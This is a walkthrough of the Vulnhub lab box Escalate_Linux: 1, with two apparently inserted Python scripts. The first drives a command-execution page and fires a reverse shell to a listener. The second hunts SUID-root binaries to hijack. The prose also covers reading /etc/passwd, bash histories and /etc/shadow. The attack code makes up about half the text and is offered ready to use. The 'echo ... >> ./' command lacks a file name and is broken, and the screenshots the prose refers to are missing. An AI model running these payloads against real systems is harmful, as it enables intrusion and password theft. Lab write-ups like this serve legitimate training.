Vulnhub Escalate_Linux: 1 Walkthrough

    There are a few new releases on Vulnhub and the one I'm writing about today claims there are 12 avenues for privilege escalation.  Honestly, I'm not interested in finding 12 different privilege escalations.  I have the patience and the time for one.  I figured with that many avenues, this would be over quickly.  I appreciate the effort but I'm one and done on this box.

    If you're on the hunt for all 12, I've got a few hints in the screenshots.  I would also look at cron because I seem to recall seeing something there as well when I was hunting around post root.  

    Anyway, kicking off with Nmap:

    Quite a lot of output so I broke it up into two:

    While I was running fuzzing tools on port 80, I started poking around at SMB.  I found this:

    Couldn't access it with the Guest account and then I moved on and never came back.  Could be something there.

    Our Gobuster output uncovers:

    shell.php -- looks interesting:

    I have an idea as to what to do here:

    Cool.  We can execute commands.  Except when I tried a longer command with spaces and special characters in it, shell.php didn't like it, so I started URL-encoding the command in Burp and that seemed to do the trick:

    Prior to going for the shell, I just want to run wget to see if I can make outbound connections. 

    Feeding our URL encoded command into Repeater:

    With a handler setup:

    Excellent!  We catch the inbound connection. 

    Let's see if Python is installed:

    Feeding our data into Repeater:

    Checking the output window:


    Now for a Python reverse shell:

    Feeding it into Repeater:

    With our handler setup:

    Once I've upgraded the shell I'm getting doubled characters, which is annoying.  We can clean that up by suspending the shell with Ctrl-Z, running the following in the local terminal, and then typing fg to bring the shell back:

    stty raw -echo
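    The Burp Repeater steps above (URL-encode the command, probe egress with wget, check for Python, then fire the Python reverse shell) can be scripted.  The following is an added example and not the author's code or anything from the box; it assumes shell.php reads the command from a GET parameter named cmd (the post never shows the parameter name), and the target and listener addresses are placeholders.

```python
"""Drive the command-execution bug in shell.php without Burp.

Added example, not the walkthrough's own code.  Assumptions: shell.php
takes the command in a GET parameter called ``cmd`` (hypothetical), and
TARGET / LHOST / LPORT are placeholder addresses.
"""
import shlex
import urllib.parse
import urllib.request

TARGET = "http://10.0.0.20/shell.php"   # placeholder target (assumption)
LHOST, LPORT = "10.0.0.1", 4444         # attacker listener (assumption)


def encode(cmd: str) -> str:
    """Percent-encode every reserved character, including spaces, quotes,
    '/' and '&', so the whole command survives the query string intact.
    This is what Burp's URL-encode did for the author."""
    return urllib.parse.quote(cmd, safe="")


def build_url(base: str, cmd: str, param: str = "cmd") -> str:
    """Full request URL for one command."""
    return f"{base}?{param}={encode(cmd)}"


def wget_probe(lhost: str, lport: int) -> str:
    """Egress check: one HTTP request back to our listener proves outbound
    connectivity before we spend time on a shell."""
    return f"wget -q -O /dev/null http://{lhost}:{lport}/probe"


def python_reverse_shell(lhost: str, lport: int) -> str:
    """Classic Python socket/dup2 reverse shell, single-quoted so it can be
    passed as one argument on the shell.php command line."""
    payload = (
        "import socket,subprocess,os;"
        "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
        f's.connect(("{lhost}",{lport}));'
        "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
        'subprocess.call(["/bin/sh","-i"])'
    )
    return f"python -c {shlex.quote(payload)}"


def run(cmd: str, base: str = TARGET, timeout: float = 5.0) -> str:
    """Send one command to shell.php and return the response body, which
    is the command's output."""
    with urllib.request.urlopen(build_url(base, cmd), timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # Same order as the walkthrough: egress check, interpreter check, shell.
    print(run(wget_probe(LHOST, LPORT)))
    print(run("which python python3"))
    try:
        run(python_reverse_shell(LHOST, LPORT), timeout=3)
    except Exception:
        # Expected: shell.php never returns while the reverse shell is
        # connected, so the HTTP request times out.  Check the listener.
        pass
```

    Start the handler (nc -lvnp 4444) before running the script; the wget probe should show up on a second listener on the port you pass to wget_probe, and the final request will time out on the client side while the shell lands on the handler.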

    Checking out /etc/passwd

    A bunch of users, which I'm sure is one big giant troll to get to 12 privilege escalations.  

    But with all of those users, I wonder if we can gather some information from .bash_history files:

    I clipped off a bunch of the lines but if you're interested in more roots, you'll want to parse through it.  There are some juicy bits in there.

    Based on the above output, I wondered if some files had been left with incorrect permissions:

    We find a couple of programs under the users' home directories that run with root privileges.  

    If you attempt to run /home/user3/shell from outside of user3's home directory, it fails: the binary calls a second file by a relative path, so it looks for that file in whatever directory you are currently in rather than in /home/user3.

    But if you're in the directory:

    ... it finds the file, which runs bash as root and therefore makes you root.  #GameOver

    That same relative-path lookup is the abuse: create your own file with the same name in /tmp (chmod +x it if the binary executes it directly), cd to /tmp, and run /home/user3/shell so that it picks up your file instead of the one in user3's home.

    For example:

    cd /tmp
    echo "cat /etc/shadow" >> ./

    It should produce the contents of the shadow file, because your file runs with the binary's root privileges.  From there you could also modify or overwrite the shadow file, or just have the file spawn a root shell.  
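    The hunt above (look for files that run as root, then check whether they call something by a relative path) is the part worth automating.  The following is an added example, not the author's code or anything shipped on the box: it enumerates SUID-root files the way find / -perm -4000 -user root would, then scans each one's printable strings for ./ or ../ tokens, which is what you would otherwise do by hand with strings.  The sample bytes at the bottom are constructed for illustration and the file name in them is made up; the real binary's helper name is whatever /home/user3/shell calls.

```python
"""Find SUID-root binaries and flag ones that reference a relative path.

Added example, not the walkthrough's own code.  The string heuristic
finds the pattern behind /home/user3/shell: a setuid program that runs a
helper via "./name", so the helper is resolved against the caller's cwd.
"""
import os
import re
import stat
from typing import Iterator, List

# Runs of printable ASCII, like the strings(1) tool would print.
_PRINTABLE = re.compile(rb"[\x20-\x7e]{3,}")

# Constructed sample: an ELF-looking blob that embeds "./script" (made-up
# name) next to an absolute path, to show which one gets flagged.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
    + b"system\x00./script\x00/bin/bash\x00"
)


def is_suid_root(mode: int, uid: int) -> bool:
    """True for a regular file that is setuid and owned by root."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == 0


def find_suid_root(roots=("/",)) -> Iterator[str]:
    """Yield SUID-root files; same idea as find / -perm -4000 -user root."""
    for root in roots:
        for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
            # Pseudo-filesystems are noisy and never hold real binaries.
            dirnames[:] = [d for d in dirnames
                           if os.path.join(dirpath, d) not in ("/proc", "/sys", "/dev")]
            for name in filenames:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if is_suid_root(st.st_mode, st.st_uid):
                    yield path


def relative_exec_refs_bytes(data: bytes) -> List[str]:
    """Printable tokens that start with './' or '../'.  Absolute paths are
    ignored; a relative one is resolved against the caller's working
    directory, which is the hijack the post describes."""
    hits = []
    for m in _PRINTABLE.finditer(data):
        for token in m.group().decode("ascii").split():
            if token.startswith(("./", "../")):
                hits.append(token)
    return hits


def relative_exec_refs(path: str) -> List[str]:
    """Same check against a file on disk."""
    with open(path, "rb") as f:
        return relative_exec_refs_bytes(f.read())


if __name__ == "__main__":
    # On the target: every SUID-root file that names a relative path is a
    # candidate.  Create that name in a writable directory, chmod +x it,
    # cd there and run the SUID binary, exactly as with /home/user3/shell.
    for suid_path in find_suid_root():
        refs = relative_exec_refs(suid_path)
        if refs:
            print(f"{suid_path}: relative refs {refs}")
    print("sample:", relative_exec_refs_bytes(SAMPLE_BINARY))
```

    The string scan is a heuristic: a binary that calls execvp("script") with a bare name (PATH lookup rather than cwd) will not match ./, and a hit only tells you where to look, not that the call is reachable.  Confirm by running the binary from a different directory, as the author did, and watching it fail.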

    Anyway, my time is up.  Hope this helps.

    © 2020